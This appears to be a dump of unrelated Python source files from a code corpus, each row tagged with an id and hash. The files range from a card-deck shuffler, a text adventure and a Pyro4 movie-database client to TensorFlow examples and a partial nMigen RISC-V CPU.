storey.V3ioDriver(endpoint), stream_path
)
else:
step._async_object = storey.Map(lambda x: x)
elif not step.async_object or not hasattr(step.async_object, "_outlets"):
# if regular class, wrap with storey Map
step._async_object = storey.Map(
step._handler,
full_event=step.full_event or step._call_with_event,
input_path=step.input_path,
result_path=step.result_path,
name=step.name,
context=context,
)
if not step.next and hasattr(step, "responder") and step.responder:
# if responder step (return result), add Complete()
step.async_object.to(storey.Complete(full_event=True))
wait_for_result = True
default_source = storey.SyncEmitSource()
return default_source, wait_for_result
|
22,019 | 93e52c034987a91a269758207fb5d59d0d9c80b1 | import Class.SeleniumBrowser
import Module.Algorithms
import Module.Utility
import Module.logger
import Module.getObject
import Module.CleanUp
import Module.Report
import Class.UserDefinedException
def uploadFile(driverObject,uploadButtonName,filename,position=1):
Excep = Class.UserDefinedException.UserDefinedException()
filePath = Module.Utility.getFileTransferPath(filename)
success = 0
if uploadButtonName == None:
Module.logger.ERROR("Button name not provided")
obj = Module.getObject.getObjByRepo(driverObject,"uploadbutton",uploadButtonName)
if obj != None:
try:
obj.send_keys(filePath)
Module.logger.INFO("File with name" + filePath + " is uploaded")
success = 1
except:
Module.logger.ERROR("File with name" + filePath + " is not uploaded")
else:
Module.logger.INFO("Object " +uploadButtonName+" is not found in Repository")
if success == 0:
if position == 1:
obj = Module.getObject.getObjByAlgo(driverObject,"button",uploadButtonName)
else:
obj = Module.getObject.getObjByAlgoOnPosition(driverObject,"button",uploadButtonName,position)
if obj != None:
try:
inputObj = obj.find_element_by_tag_name("input")
inputObj.send_keys(filePath)
Module.logger.INFO("File with name" + filePath + " is uploaded")
except:
# Clean up before raising exception
Module.Report.Failure(driverObject, "File" + filePath + " is not uploaded")
Module.CleanUp.killAllProcess()
Excep.raiseException("File with name:" + filePath + " is not uploaded")
else:
Module.Report.Failure(driverObject, "No Object found for upload button "+uploadButtonName)
Excep.raiseException("No Object found for upload button "+uploadButtonName) |
22,020 | d3d6d52db4d2bdaaeb2c1f301214bf31fdd8c5d1 | # Copyright 2021 D-Wave Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import requests
class RequestError(requests.exceptions.RequestException):
"""Generic SAPI request error"""
error_msg = None
error_code = None
def __init__(self, *args, **kwargs):
# exception message populated from, in order of precedence: `args`,
# `error_msg` kwarg, exception docstring
self.error_msg = kwargs.pop('error_msg', self.error_msg)
self.error_code = kwargs.pop('error_code', self.error_code)
if len(args) < 1 and self.error_msg is not None:
args = (self.error_msg, )
if len(args) < 1:
args = (self.__doc__, )
super().__init__(*args, **kwargs)
class ResourceBadRequestError(RequestError):
"""Resource failed to parse the request"""
class ResourceAuthenticationError(RequestError):
"""Access to resource not authorized: token is invalid or missing"""
class ResourceAccessForbiddenError(RequestError):
"""Access to resource forbidden"""
class ResourceNotFoundError(RequestError):
"""Resource not found"""
class ResourceConflictError(RequestError):
"""Conflict in the current state of the resource"""
class ResourceLimitsExceededError(RequestError):
"""Number of resource requests exceed the permitted limit"""
class ResourceBadResponseError(RequestError):
"""Unexpected resource response"""
class InternalServerError(RequestError):
"""internal server error occurred while request handling."""
class RequestTimeout(RequestError):
"""API request timed out"""
|
22,021 | 163cad7c283c76f483e0cca299d6fd037a64d4e2 | from .stock import Stock
class PyIEX(object):
def __init__(self):
self._stock = Stock()
@property
def stock(self):
return self._stock
|
22,022 | 35b044367b43620391ee319225c013f17a0859d9 | # Generated by Django 2.2.7 on 2019-11-18 19:13
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('notes', '0003_personalnote'),
]
operations = [
migrations.AddField(
model_name='note',
name='subtitle',
field=models.CharField(default='default subtitle', max_length=200),
),
]
|
22,023 | ff1d2da336d3dadf5e95a0e861509396bdb91a56 | # colorselector
import os,sys
from math import sqrt
sys.path.append(
os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))
from brush_class import Brush
from random import randint as random
class colorSelector(Brush):
displayName = "Color Picker"
description = "Selects a color from the Canvas";
type = "TOOL";
cursor = "target";
def __init__(this, canvasobject):
this.canvas = canvasobject;
this.setColor = False;
this.color = None;
this.type = "TOOL";
this.displayName= "Color Picker";
this.description= "Selects a color from the Canvas";
def leaveStamp(this, x, y):
if(not this.canvas.getColorAt(x,y)[3] == 0):
this.canvas.setColor(this.canvas.getColorAt(x,y));
this.canvas.tool_window.updateColor();
return True;
def identifier(this):
return "colorSelector"; |
22,024 | ff5e94efc4445e1ca8fc4ffb2a6ccfb2414c17f5 | import tensorflow as tf
import os
import cProfile
def variable_turn_off_gradient():
step_counter = tf.Variable(1, trainable=False)
print(step_counter)
def variable_placing():
with tf.device('CPU:0'):
# Create some tensors
a = tf.Variable([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
b = tf.constant([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]])
c = tf.matmul(a, b)
print(c)
if __name__ == '__main__':
"""
recommended way to represent shared, persistent state your program manipulates
Higher level libraries like tf.keras use tf.Variable to store model parameters
A variable looks and acts like a tensor, and, in fact, is a data structure backed by a tf.Tensor
"""
my_tensor = tf.constant([[1.0, 2.0], [3.0, 4.0]])
my_variable = tf.Variable(my_tensor)
print("Shape: ", my_variable.shape)
print("DType: ", my_variable.dtype)
print("As NumPy: ", my_variable.numpy())
print("\nViewed as a tensor:", tf.convert_to_tensor(my_variable))
print("\nIndex of highest value:", tf.argmax(my_variable))
# This creates a new tensor; it does not reshape the variable.
print("\nCopying and reshaping: ", tf.reshape(my_variable, [1, 4]))
# Variables can be all kinds of types, just like tensors
bool_variable = tf.Variable([False, False, False, True])
complex_variable = tf.Variable([5 + 4j, 6 + 1j])
# assign
a = tf.Variable([2.0, 3.0])
a.assign([1, 2]) # This will keep the same dtype, float32
# a.assign([1.0, 2.0, 3.0]) # Not allowed as it resizes the variable
# copy, two variables will not share the same memory
a = tf.Variable([2.0, 3.0])
b = tf.Variable(a) # Create b based on the value of a
a.assign([5, 6])
print(a.numpy()) # [5. 6.]
print(b.numpy()) # [2. 3.]
print(a.assign_add([2, 3]).numpy()) # [7. 9.]
print(a.assign_sub([7, 9]).numpy()) # [0. 0.]
variable_turn_off_gradient()
variable_placing()
|
22,025 | e5f29a9fb7c2d4106d32342267a4290ff0ae999f | class Player:
def __init__(self, name, room):
self.name = name
self.room = room
self.moves = 0
# Your code works great for allowing the user to navigate to the different rooms in your adventure game. These comments
# are suggestions for how you could potentially condense your code, allowing you to reuse some parts of your code.
# Instead of creating four different Room classes, you could try creating one Room class. Then, you could initialize
# four room objects, by passing in values to the constructor of the Room class that make each room different. Here is an
# example of how to do this:
#
# class Room(): # Probably do not want to inherit Player in this class, because Room is not a "type of" Player.
# def __init__(self, room, direction1, neighbor1, direction2, neighbor2):
# self.room = room
# self.direction1 = direction1
# self.neighbor1 = neighbor1
# self.direction2 = direction2
# self.neighbor2 = neighbor2
#
# # The code below uses the class variables defined above in the return message, instead of hardcoding the message.
# def __repr__(self):
# return (f"Welcome to Room {self.room}. Use {self.direction1} to move to Room {self.neighbor1}, or "
# f"{self.direction2} to move to Room {self.neighbor2}.")
class Room_1(Player):
def __init__(self):
self.room = 1
def __repr__(self):
return "Welcome to Room 1. Use d to move to Room 2, or s to move to Room 3."
class Room_2(Player):
def __init__(self):
self.room = 2
def __repr__(self):
return "Welcome to Room 2. Use a to move to Room 1, or s to move to Room 4."
class Room_3(Player):
def __init__(self):
self.room = 3
def __repr__(self):
return "Welcome to Room 3. Use w to move to Room 1, or d to move to Room 4."
class Room_4(Player):
def __init__(self):
self.room = 4
def __repr__(self):
return "Welcome to Room 4. Use w to move to Room 2, or a to move to Room 3."
class Game:
def __init__(self):
name = input("What is your name, adventurer? ")
self.player = Player(name, 1)
def play_game(self):
# Instead of creating four room variables here, you could create a "rooms" dictionary, as shown below. This
# would let you access any room object by using its index number. For example, "rooms[1]" would give you the
# Room object for room 1:
#
# rooms = {1: Room(room=1, direction1="d", neighbor1=2, direction2="s", neighbor2=3),
# 2: Room(room=2, direction1="a", neighbor1=1, direction2="s", neighbor2=4),
# 3: Room(room=3, direction1="w", neighbor1=1, direction2="d", neighbor2=4),
# 4: Room(room=4, direction1="w", neighbor1=2, direction2="a", neighbor2=3)}
# current_room = rooms[1]
room_1 = Room_1()
room_2 = Room_2()
room_3 = Room_3()
room_4 = Room_4()
room = room_1.room
game_active = True
print("Welcome to Adventure, {}!".format(self.player.name))
print("There are four rooms that you can explore. The rooms a laid out as follows:")
print("Top Left: Room 1 Top Right: Room 2")
print("Bottom Left: Room 3 Bottom Right: Room 4")
print("Your adventure starts in room number 1.")
print("")
while game_active:
move = input("Use w, a, s, and d to move. Type q to quit the game.")
print("")
if move == "q".lower():
print("Game over!")
print("You made {} moves.".format(self.player.moves))
game_active = False
# Lastly, you could replace the "elif" conditions in your code below that start with "elif move == ", by
# using the commented code below one time. This code uses the "rooms" dictionary from the previous comment.
#
# elif move.lower() != current_room.direction1 and move.lower() != current_room.direction2:
# print("There's nowhere to go! Try a different direction.")
# print("")
# elif move.lower() == current_room.direction1:
# current_room = rooms[current_room.neighbor1]
# self.player.moves += 1
# print(current_room)
# print("")
# elif move.lower() == current_room.direction2:
# current_room = rooms[current_room.neighbor2]
# self.player.moves += 1
# print(current_room)
# print("")
elif move == "w".lower():
if room == room_1.room or room == room_2.room:
print("There's nowhere to go! Try a different direction.")
print("")
elif room == room_3.room:
room = room_1.room
self.player.moves += 1
print(room_1)
print("")
elif room == room_4.room:
room = room_2.room
self.player.moves += 1
print(room_2)
print("")
elif move == "a".lower():
if room == room_1.room or room == room_3.room:
print("There's nowhere to go! Try a different direction.")
print("")
elif room == room_2.room:
room = room_1.room
self.player.moves += 1
print(room_1)
print("")
elif room == room_4.room:
room = room_3.room
self.player.moves += 1
print("")
print(room_3)
elif move == "s".lower():
if room == room_3.room or room == room_4.room:
print("There's nowhere to go! Try a different direction.")
print("")
elif room == room_1.room:
room = room_3.room
self.player.moves += 1
print(room_3)
print("")
elif room == room_2.room:
room = room_4.room
self.player.moves += 1
print(room_4)
print("")
elif move == "d".lower():
if room == room_2.room or room == room_4.room:
print("There's nowhere to go! Try a different direction.")
print("")
elif room == room_1.room:
room = room_2.room
self.player.moves += 1
print(room_2)
print("")
elif room == room_3.room:
room = room_4.room
self.player.moves += 1
print(room_4)
print("")
else:
print("That's not a valid input.")
print("")
game = Game()
game.play_game()
|
22,026 | 6e99672eb164e020c779b3ce2ce80ed1ac2c1df0 | def printout(n, v):
print "Case #" + str(n) + ": " + str(v)
def isCorrect(arr):
symbols = set()
for i,j in enumerate(arr):
for k, l in enumerate(j):
if l != '.':
symbols.add((l, i, k))
for i in symbols:
for j in symbols:
if i != j:
if i[1]==j[1] or i[2]==j[2]:
if i[0] == '+' or j[0] == '+':
pass
else:
print "ZLEEEE"
if i[1]+i[2] == j[1]+j[2] or i[1]-i[2]==j[1]-j[2]:
if i[0] == 'x' or j[0] == 'x':
pass
else:
print "ZLEEEE2"
def call(ii):
n, m = [int(i) for i in raw_input().split()]
row = [' ' for i in range(n)]
nonplus = -1
for i in range(m):
v, r, c = raw_input().split()
row[int(c)-1] = v
if v != '+':
nonplus = int(c)-1
res = []
if nonplus == -1:
nonplus = 0
row[0] = 'o'
res.append(('o', 0, 0))
for i,v in enumerate(row):
if v == ' ':
res.append(('+', 0, i))
elif v == 'x':
res.append(('o', 0, i))
nonplus = i
for i in range(0,nonplus):
res.append(('x', i+1, i))
for i in range(nonplus+1, n):
res.append(('x', i, i))
for i in range(1,n-1):
res.append(('+', n-1, i))
"""
#print n, row
s=[['.' for j in range(n)] for i in range(n)]
s[0] = row
for i in res:
s[i[1]][i[2]] = i[0]
st=''
for i in s:
for j in i:
st+=j
st+='\n'
#print st
return"""
printout(ii, str((3*n - 2) if n != 1 else 2)+ ' '+str(len(res)))
#isCorrect(s)
for i in res:
print i[0], i[1]+1, i[2]+1
t = int(raw_input())
for ii in xrange(t):
call(ii+1) |
22,027 | 5098276f4fde8e6bfe42057c6adca3e31e863fb5 | #
#
#
# Description-----------------------------------------------------------------------------------------------------------
# Deck.py is a class file containing functions for the manipulations of cards, such as creating decks,
# shuffling, sorting, discarding
# Inherits the cards class
#
#
#
#
#
#
#
#
import random
# ----------------------------------------------------------------------------------------------------------------------
# Import statements
import cards
# ----------------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------------
# CONSTANTS
NUM_SUITS = 4 # four suits in standard card deck
NUM_PER_SUIT = 13 # 13 cards in a standard suit
CUT_BUFFER = 5 # number of cards from end considered a viable selection for a cut
MIX_BUFFER = 4 # range for cards to be swapped in a mix shuffle
# ----------------------------------------------------------------------------------------------------------------------
class Deck:
def __init__(self):
self.deck_list = []
self.size = 0
return
def make_deck(self):
# the following function makes a deck
for i in range(NUM_SUITS):
for j in range(NUM_PER_SUIT):
new_card = cards.Card(j, i) # create a temporary card
self.deck_list.append(new_card) # add cards to end of array
# new_card.print_properties() # print card, mostly for testing.
self.size = len(self.deck_list)
return
def print_deck(self):
for i in range(self.size):
self.deck_list[i].print_properties()
print()
return
def shuffle(self):
# takes in an array of cards, and randomly cuts, and mixes cards
it = random.randint(30, 100)
for i in range(it):
self.mix(random.randint(10, 30))
self.cut()
self.mix(random.randint(10, 30))
self.mix(random.randint(10, 30))
self.cut()
self.mix(random.randint(10, 30))
self.mix(random.randint(10, 30))
self.mix(random.randint(10, 30))
self.cut()
return
def cut(self):
# cuts a deck at a given index, and places the lower half atop the cut location.
random.seed()
cut_index = random.randint(CUT_BUFFER, self.size-CUT_BUFFER)
# selection size represents the number of cards at the bottom which must me moved to top
selection_size = self.size-cut_index
# if less than half of deck size, should shift top down instead of bottom up.
if cut_index < (self.size-1)/2:
for i in range(cut_index):
temp = self.deck_list[0]
self.deck_list.append(temp)
self.deck_list.pop(0)
else:
for i in range(selection_size):
# a cut gets a random value with an offset of at least CUT_BUFFER from the deck ends
# and selects cards from selected index to the bottom of the deck, and inserts them at the start of
# the deck and pops off the old values as we go.
temp = self.deck_list[self.size-1]
self.deck_list.insert(0, temp)
self.deck_list.pop()
return
def mix(self, iterations):
# mixes the cards provided by randomly swapping indexes within 4 places of one another
# parameter iterations defines number of cards swapped. by default, deck size is used.
if iterations is None:
iterations = self.size
for i in range(iterations):
swap_dex = random.randint(-3, 3)
index = random.randint(MIX_BUFFER, self.size-MIX_BUFFER)
temp = self.deck_list[index]
self.deck_list[index] = self.deck_list[index + swap_dex]
self.deck_list[index + swap_dex] = temp
return
def sort_value(self, group_size, offset):
# attempting to integrate group_size and offset to allow user to sort a section of say 5 cards by value. Is
# proving to be difficult- mostly gets sorted but then stops a few iterations short of completion apparently.
# the idea is to operate this on a deck that was just sorted by suit, and then call this on the number of cards
# in a suit resulting in a sorted subset
if group_size is None:
group_size = self.size
if offset is None:
offset = 0
# this function uses a selection sort algorithm to sort the deck
# based on the card values, Ace being low in this instance (ignores suit)
start_dex = offset * group_size
end_dex = start_dex + group_size - 1
mindex = 0
for i in range(start_dex, end_dex):
mindex = i
for j in range(i+1, end_dex+1): # for j=i+1 < self.size j++
if self.deck_list[j].position < self.deck_list[mindex].position:
mindex = j
self.swap(i, mindex)
return
def sort_suit(self):
# this function uses a selection sort algorithm to sort the deck
# based on the suit values, alphabetical indexing. (ignores value)
mindex = 0
for i in range(self.size-1):
mindex = i
for j in range(i+1, self.size): # for j=i+1 < self.size j++
if self.deck_list[j].suit[0] < self.deck_list[mindex].suit[0]:
mindex = j
self.swap(i, mindex)
return
def simple_sort(self):
# an inefficient but simple way to return the deck to the original sorted state
# (alphabetical by suit, low to high material value).
self.deck_list = []
self.make_deck()
def super_sort(self):
# currently doesn't work... Supposed to sort them by suit, and then by value, but there's some sort of error.
group_size = int(self.size / NUM_SUITS)
print("Group size is " + str(group_size))
self.sort_suit()
# self.print_deck()
print()
for i in range(NUM_SUITS):
self.sort_value(group_size, i)
def swap(self, elem1, elem2):
#
temp = self.deck_list[elem1]
self.deck_list[elem1] = self.deck_list[elem2]
self.deck_list[elem2] = temp
return
|
22,028 | a2b4ddd78deef9d83c9fd47578b11466153682c5 | import webiopi
import datetime
GPIO = webiopi.GPIO
LIGHT = 17 # GPIO pin using BCM numbering
LED = 15
# setup function is automatically called at WebIOPi startup
def setup():
# set the GPIO used by the light to output
GPIO.setFunction(LIGHT, GPIO.IN, GPIO.PUD_DOWN)
GPIO.setFunction(LED, GPIO.OUT)
# loop function is repeatedly called by WebIOPi
def loop():
# gives CPU some time before looping again
#print "\n LIGHT_value = %d\n" %(GPIO.digitalRead(LIGHT))
if (GPIO.digitalRead(LIGHT) == GPIO.LOW):
GPIO.digitalWrite(LED, GPIO.LOW)
if (GPIO.digitalRead(LIGHT) == GPIO.HIGH):
GPIO.digitalWrite(LED, GPIO.HIGH)
webiopi.sleep(1)
# destroy function is called at WebIOPi shutdown
def destroy():
GPIO.digitalWrite(LED, GPIO.LOW)
|
22,029 | 8f515c1978685a2002684b0d0818ff7afb771c3e | import Pyro4
from enums import ROp
def get_user_id():
uid = input('Enter a user ID (number): ')
while not uid.isdigit():
print('- ' * 32)
print(f'Invalid user ID [ {uid} ]. User ID must be a number.')
print('- ' * 32)
uid = input('Enter a user ID (number): ')
return int(uid)
def get_title():
title = input('Enter movie title: ').lower()
return title
def get_tag():
tag = input('Enter a tag for the movie: ')
return tag
def get_genre():
genre = input('Enter a movie genre: ').lower()
return genre
def get_rating():
rating = input('Enter movie rating (0 - 5): ')
while True:
try:
rating = float(rating)
if not 0 <= rating <= 5:
print()
print('- ' * 32)
print(f'Invalid movie rating [ {rating} ]. ',
'Rating must be between 0 - 5.')
print('- ' * 32)
print()
rating = input('Enter movie rating (0 - 5): ')
continue
elif rating % 0.5 != 0:
rating = round(rating * 2) / 2
print('Your rating was rounded to the nearest 0.5.')
break
except ValueError:
print()
print('- ' * 32)
print(f'Invalid movie rating [ {rating} ]". ',
'Rating must be a number.')
print('- ' * 32)
print()
rating = input('Enter movie rating (0 - 5): ')
continue
return rating
def format_search_result(result, search_var, search_val):
if result:
n = len(result)
titles = "\n".join([row['title'] for row in result])
response = (f'Results for {search_var} "{search_val}" ({n} results):\n'
f'{titles}')
else:
response = f'No results for {search_var} "{search_val}"'
return response
class Client:
'''
Class for Client program of distributed system.
'''
def __init__(self):
self.menu_options = [
' 1. Rate a movie',
' 2. Add a tag to a movie',
' 3. Get the average rating for a movie',
' 4. Get your ratings',
' 5. Get the genres for a movie',
' 6. Get the tags for a movie',
' 7. Search movies by title',
' 8. Search movies by genre',
' 9. Search movies by tag'
]
self.frontend = self._find_frontend()
def send_request(self, request):
'''
Send a request to the front end, handling any errors which occur.
Params:
(tuple) request: request to send, consisting of a command and args
Returns:
(bool) error: whether an error occurred at any point
result: if error, this is a string describing the error. Otherwise
the response to the request by the front end.
'''
result = None
error = True
if self.frontend is None:
try:
self.frontend = self._find_frontend()
except Pyro4.errors.NamingError:
print('Could not find Pyro nameserver.')
if self.frontend is not None:
try:
result = self.frontend.send_request(request)
error = False
except Pyro4.errors.ConnectionClosedError:
self.frontend._pyroRelease()
self.frontend = None
result = 'Could not connect to front end server.'
except Exception as e:
result = e
else:
result = 'Could not find front end server.'
return error, result
def print_menu(self):
print()
print(' --- Movie Database ---')
print()
[print(option) for option in self.menu_options]
print()
print(f' {len(self.menu_options) + 1}. Exit')
print()
print('Enter option: ', end='')
def main(self):
'''
Main loop of client program.
'''
userId = get_user_id()
while True:
request = None
response = None
self.print_menu()
choice = input()
print()
if choice == '1':
op = ROp.ADD_RATING.value
title = get_title()
rating = get_rating()
request = (op, userId, title, rating)
error, result = self.send_request(request)
if error:
response = result
else:
response = f'{result}\n\n'
response += f'You have rated {title} a {rating}/5'
elif choice == '2':
op = ROp.ADD_TAG.value
title = get_title()
tag = get_tag()
request = (op, userId, title, tag)
error, result = self.send_request(request)
if error:
response = result
else:
response = f'{result}\n\n'
response += f'You have tagged {title} with "{tag}"'
elif choice == '3':
op = ROp.GET_AVG_RATING.value
title = get_title()
request = (op, title)
error, result = self.send_request(request)
if error:
response = result
else:
response = (f'Average rating for {title}: '
f'{round(result, 1)}/5')
elif choice == '4':
op = ROp.GET_RATINGS.value
title = None
print('Choose a movie you want to see your rating of,',
'or leave it blank to view all of your ratings.')
title = get_title()
request = (op, userId, title)
error, result = self.send_request(request)
if error:
response = result
else:
if result:
response = ' Title'.ljust(50, ' ') + '| Rating\n'
response += '-' * 65 + '\n'
for row in result:
if len(row['title']) > 50:
response += row['title'][:48] + '- | '
response += row['rating'] + '\n -'
response += row['title'][48:].ljust(48, ' ')
response += '|\n'
else:
response += row['title'].ljust(50, ' ') + '| '
response += row['rating'] + '\n'
else:
response = 'You have submitted no ratings yet.'
elif choice == '5':
op = ROp.GET_GENRES.value
title = get_title()
request = (op, title)
error, result = self.send_request(request)
if error:
response = result
else:
result = "\n".join(result)
response = f'Genres for {title}:\n{result}'
elif choice == '6':
op = ROp.GET_TAGS.value
title = get_title()
request = (op, title)
error, result = self.send_request(request)
if error:
response = result
else:
result = "\n".join(result)
response = f'Tags for {title}:\n{result}'
elif choice == '7':
op = ROp.SEARCH_TITLE.value
title = get_title()
request = (op, title)
error, result = self.send_request(request)
if error:
response = result
else:
response = format_search_result(
result, 'title', title)
elif choice == '8':
op = ROp.SEARCH_GENRE.value
genre = get_genre()
request = (op, genre)
error, result = self.send_request(request)
if error:
response = result
else:
response = format_search_result(
result, 'genre', genre)
elif choice == '9':
op = ROp.SEARCH_TAG.value
tag = get_tag()
request = (op, tag)
error, result = self.send_request(request)
if error:
response = result
else:
response = format_search_result(result, 'tag', tag)
elif choice == '10':
print('Bye!')
break
else:
print('- ' * 32)
print(
f'Invalid option [ {choice} ]. ',
f'Enter an option from 1 - {len(self.menu_options) + 1}.'
)
print('- ' * 32)
continue
print()
print(response)
print()
input('Press ENTER to continue.')
@staticmethod
def _find_frontend():
'''
Find the front end server
Returns:
fe: remote object for front end server
'''
fe = None
with Pyro4.locateNS() as ns:
try:
uri = ns.lookup('network.frontend')
fe = Pyro4.Proxy(uri)
except Pyro4.errors.NamingError:
pass
return fe
if __name__ == '__main__':
try:
client = Client()
try:
client.main()
except KeyboardInterrupt:
print('\nCTRL+C pressed, exiting.')
except Pyro4.errors.NamingError:
print('Could not find Pyro nameserver, exiting.')
|
22,030 | 36db202f982e0b85acb4757e1cd3e8a7612b6cc2 | NAME_DISPLAY_MAP = {
"vt_symbol": " native code ",
"direction": " direction ",
"price": " price ",
"volume": " quantity ",
"time": " execution time ( second )",
"interval": " each round interval ( second )",
"offset": " kaiping ",
"active": " algorithmic state ",
"traded": " the number of transactions ",
"order_volume": " single delegate ",
"timer_count": " countdown round ",
"total_count": " cumulative countdown ",
"template_name": " algorithm template ",
"display_volume": " number hang out ",
"stop_price": " trigger price ",
"price_add": " commissioned super price ",
"step_price": " trading grid spacing ",
"step_volume": " grid number of transactions ",
"order_type": " types of ",
"active_vt_symbol": " initiative leg ",
"passive_vt_symbol": " passive leg ",
"spread_up": " spread limit ",
"spread_down": " spread limit ",
"max_pos": " max open "
}
|
22,031 | dd31af337c48ca4a00a6e262044958c7bff6671e | from nmigen import *
from nmigen.asserts import *
from enum import IntEnum
XLEN = 32
class ALUOp(IntEnum):
ADD = 0x0
SUB = 0x1
LT = 0x2
LTU = 0x4
AND = 0x6
OR = 0x7
XOR = 0x8
SRL = 0x9
SRA = 0xa
SLL = 0xb
class RVOpc(IntEnum):
LOAD = 0b00_000
MISC_MEM = 0b00_011
OP_IMM = 0b00_100
AUIPC = 0b00_101
STORE = 0b01_000
OP = 0b01_100
LUI = 0b01_101
BRANCH = 0b11_000
JALR = 0b11_001
JAL = 0b11_011
SYSTEM = 0b11_100
def imm_i(instr):
return Cat(instr[20:], Repl(instr[-1], 20))
def imm_s(instr):
return Cat(instr[7:12], instr[25:], Repl(instr[-1], 20))
def imm_b(instr):
return Cat(C(0, 1), instr[8:12], instr[25:31], instr[7], Repl(instr[-1], 20))
def imm_u(instr):
return Cat(C(0, 12), instr[12:])
def imm_j(instr):
return Cat(C(0, 1), instr[21:31], instr[20], instr[12:20], Repl(instr[-1], 12))
class Hazard2Shifter(Elaboratable):
def __init__(self):
self.i = Signal(XLEN)
self.shamt = Signal(range(XLEN))
self.right = Signal()
self.arith = Signal()
self.o = Signal(XLEN)
def elaborate(self, platform):
m = Module()
accum = Signal(XLEN, name="shift_pre_reverse")
m.d.comb += accum.eq(Mux(self.right, self.i, self.i[::-1]))
for i in range(self.shamt.width):
accum_next = Signal(XLEN, name=f"shift_accum{i}")
m.d.comb += accum_next.eq(Mux(self.shamt[i],
Cat(accum[1 << i:], Repl(accum[-1] & self.arith, 1 << i)),
accum
))
accum = accum_next
m.d.comb += self.o.eq(Mux(self.right, accum, accum[::-1]))
return m
class Hazard2ALU(Elaboratable):
def __init__(self):
self.i0 = Signal(XLEN)
self.i1 = Signal(XLEN)
self.op = Signal(Shape.cast(ALUOp))
self.take4 = Signal()
self.cmp = Signal()
self.o = Signal(XLEN)
def elaborate(self, platform):
m = Module()
m.submodules.shifter = shifter = Hazard2Shifter()
# Add/subtract i0 and i1, then subtract 4 if take4 is true. Use of 3-input adder
# encourages tools to implement as carry-save.
adder = sum((
self.i0,
self.i1 ^ Repl(self.op != ALUOp.ADD, XLEN),
Cat(self.op != ALUOp.ADD, C(0, 1), Repl(self.take4, XLEN - 2))
))[:XLEN]
less_than = Mux(self.i0[-1] == self.i1[-1], adder[-1],
Mux(self.op == ALUOp.LTU, self.i1[-1], self.i0[-1])
)
m.d.comb += self.cmp.eq(Mux(self.op == ALUOp.SUB, self.i0 == self.i1, less_than))
# Bitwise ops can be implemented as a single rank of LUT4s. Try to encourage this.
bitwise = Signal(XLEN)
with m.Switch(self.op[0:2]):
with m.Case(ALUOp.AND & 0x3):
m.d.comb += bitwise.eq(self.i0 & self.i1)
with m.Case(ALUOp.OR & 0x3):
m.d.comb += bitwise.eq(self.i0 | self.i1)
with m.Case():
m.d.comb += bitwise.eq(self.i0 ^ self.i1)
m.d.comb += [
shifter.i.eq(self.i0),
shifter.shamt.eq(self.i1),
shifter.right.eq(self.op != ALUOp.SLL),
shifter.arith.eq(self.op == ALUOp.SRA)
]
with m.Switch(self.op):
with m.Case(ALUOp.ADD):
m.d.comb += self.o.eq(adder)
with m.Case(ALUOp.SUB):
m.d.comb += self.o.eq(adder)
with m.Case(ALUOp.LT):
m.d.comb += self.o.eq(less_than)
with m.Case(ALUOp.LTU):
m.d.comb += self.o.eq(less_than)
with m.Case(ALUOp.SRL):
m.d.comb += self.o.eq(shifter.o)
with m.Case(ALUOp.SRA):
m.d.comb += self.o.eq(shifter.o)
with m.Case(ALUOp.SLL):
m.d.comb += self.o.eq(shifter.o)
with m.Case():
m.d.comb += self.o.eq(bitwise)
return m
class Hazard2Regfile(Elaboratable):
def __init__(self):
self.raddr1 = Signal(5)
self.raddr2 = Signal(5)
self.ren = Signal()
self.rdata1 = Signal(XLEN)
self.rdata2 = Signal(XLEN)
self.waddr = Signal(5)
self.wdata = Signal(XLEN)
self.wen = Signal()
self.mem = Memory(width=XLEN, depth=32, init=[0] * 32)
def elaborate(self, platform):
m = Module()
m.submodules.wport = wport = self.mem.write_port()
m.submodules.rport1 = rport1 = self.mem.read_port(transparent=False)
m.submodules.rport2 = rport2 = self.mem.read_port(transparent=False)
# nMigen/Yosys do not support read enable on read ports with transparency
# enabled, so need to perform write-to-read bypass manually.
prev_wdata = Signal(XLEN)
forward_wdata_to_r1 = Signal()
forward_wdata_to_r2 = Signal()
next_is_forwarded = self.wen & self.ren & (self.waddr != 0)
with m.If(next_is_forwarded):
m.d.sync += prev_wdata.eq(self.wdata)
with m.If(self.ren):
m.d.sync += [
forward_wdata_to_r1.eq(next_is_forwarded & (self.waddr == self.raddr1)),
forward_wdata_to_r2.eq(next_is_forwarded & (self.waddr == self.raddr2))
]
m.d.comb += [
rport1.addr.eq(self.raddr1),
rport1.en.eq(self.ren),
self.rdata1.eq(Mux(forward_wdata_to_r1, prev_wdata, rport1.data)),
rport2.addr.eq(self.raddr2),
rport2.en.eq(self.ren),
self.rdata2.eq(Mux(forward_wdata_to_r2, prev_wdata, rport2.data)),
wport.addr.eq(self.waddr),
wport.data.eq(self.wdata),
wport.en.eq(self.wen & (self.waddr != 0))
]
return m
class Hazard2CPU(Elaboratable):
def __init__(self, reset_vector=0x0):
self.reset_vector = reset_vector
self.htrans = Signal(2)
self.hwrite = Signal()
self.hsize = Signal(3)
self.haddr = Signal(XLEN)
self.hwdata = Signal(XLEN)
self.hrdata = Signal(XLEN)
self.hready = Signal()
def elaborate(self, platform):
m = Module()
stall = ~self.hready
### Stage F ###
i_dph_active = Signal()
d_dph_active = Signal()
d_dph_write = Signal()
d_dph_addr = Signal(2)
d_dph_size = Signal(2)
d_dph_signed = Signal()
cir = Signal(32)
cir_valid = Signal()
load_rdata = Signal(XLEN)
with m.If(i_dph_active & ~stall):
m.d.sync += cir.eq(self.hrdata)
with m.Switch(d_dph_size):
with m.Case(2):
m.d.comb += load_rdata.eq(self.hrdata)
with m.Case(1):
hword_rdata = self.hrdata.word_select(d_dph_addr[1:], 16)
m.d.comb += load_rdata.eq(Cat(hword_rdata, Repl(hword_rdata[-1] & d_dph_signed, XLEN - 16)))
with m.Case():
byte_rdata = self.hrdata.word_select(d_dph_addr, 8)
